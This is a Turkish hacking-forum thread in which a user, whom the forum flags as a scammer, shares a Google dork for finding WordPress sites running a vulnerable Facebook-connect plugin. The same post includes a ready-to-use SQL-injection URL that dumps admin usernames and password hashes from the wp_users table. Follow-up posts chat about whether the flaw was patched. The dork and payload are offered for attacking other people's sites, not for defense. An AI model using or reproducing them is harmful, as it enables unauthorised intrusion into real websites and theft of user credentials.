Yardım @King 2016 FB :')

R00T3R

Dolandırıcıdır, hiçbir konusundan dosya indirmeyin

SOYTARI
Katılım
26 Haz 2018
Tepki puanı
1,903
Rating - 0%
Yıllar önce kalmadan açıklarla exploit vay vaay vaay zaman pis akmış kıymetli dostum :)

inurl:"fbconnect_action=myhome"

bu dork

bu da exploit
/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--


Demosuda buydu;
 

R00T3R

Dolandırıcıdır, hiçbir konusundan dosya indirmeyin

SOYTARI
Katılım
26 Haz 2018
Tepki puanı
1,903
Rating - 0%
wordpress üzerinden facebookun giriş açığı login olması lazım çee
@King :')
 

R00T3R

Dolandırıcıdır, hiçbir konusundan dosya indirmeyin

SOYTARI
Katılım
26 Haz 2018
Tepki puanı
1,903
Rating - 0%
sanırsam 2017'de facebook gr'de vardı bu açık.
edit: inceledim o açık değilmiş ben bunu ilk defa görüyorum ancak güzel bir mantığı var açığın
admin panel deki açıktı ama uzun süre geçtiği için düzeltmişler ve o domain uzantısını da değiştirmişler sanırım
 
131,624Konular
3,269,832Mesajlar
315,622Kullanıcılar
inlbhSon Üye
Üst Alt